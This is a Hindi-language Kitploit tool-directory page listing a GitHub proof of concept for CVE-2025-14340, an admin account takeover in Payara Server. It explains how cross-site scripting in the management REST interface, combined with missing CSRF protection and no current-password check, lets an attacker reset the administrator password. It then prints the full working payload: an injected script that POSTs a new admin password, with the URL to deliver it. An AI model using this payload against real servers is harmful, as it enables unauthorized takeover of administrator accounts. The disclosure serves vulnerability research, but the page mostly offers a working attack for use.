Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-14340 — PoC for CVE-2025-14340: Admin account takeover in Payara Server | Kitploit
उपकरण/GitHubGitHub/deepsecurityresearch/cve-2025-14340
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAuthentication
GitHubdeepsecurityresearch/cve-2025-14340

CVE-2025-14340

PoC for CVE-2025-14340: Admin account takeover in Payara Server

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

XSS से Admin अकाउंट टेकओवर (CVE-2025-14340)

Payara के Administration Rest Interface में एक Cross-Site Scripting कमजोरी है, जो हमलावर-नियंत्रित JavaScript के निष्पादन की अनुमति देती है और admin अकाउंट टेकओवर की ओर ले जाती है। इसके कारण:

  1. पैनल HTTP Basic Auth का उपयोग करता है (क्रेडेंशियल ब्राउज़र द्वारा same-origin अनुरोधों के लिए स्वचालित रूप से भेजे जाते हैं)।
  2. change-admin-password एंडपॉइंट को किसी उपयोगकर्ता का पासवर्ड अपडेट करने के लिए वर्तमान पासवर्ड की आवश्यकता नहीं होती है।
  3. change-admin-password फ़ॉर्म में CSRF सुरक्षा नहीं है।
  4. /management/domain/version में XSS का उपयोग करने वाला एक इंजेक्टेड स्क्रिप्ट /management/domain/change-admin-password पर POST कर सकता है और किसी भी लक्षित खाते के लिए हमलावर द्वारा चुना गया पासवर्ड सेट कर सकता है — जिसके परिणामस्वरूप administrator अकाउंट टेकओवर होता है।

प्रूफ ऑफ कॉन्सेप्ट

URL:

https://panel.example.com:4848/management/domain/version?<PAYLOAD>

PAYLOAD:

root@kitploit:~
<script>
fetch('/management/domain/change-admin-password', {
 method: 'POST',
 headers: {
 'X-Requested-By': 'GlassFish REST HTML interface',
 'Accept': 'text/html',
 'Content-Type': 'application/x-www-form-urlencoded'
 },
 body:
'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
e-admin-password'
});
</script>

कानूनी

केवल अधिकृत उपयोग के लिए। DeepSecurity Perú अनधिकृत पहुंच का समर्थन नहीं करता है और प्रदान की गई जानकारी के किसी भी दुरुपयोग के लिए कोई ज़िम्मेदारी नहीं लेता है।

टूल डाउनलोड करें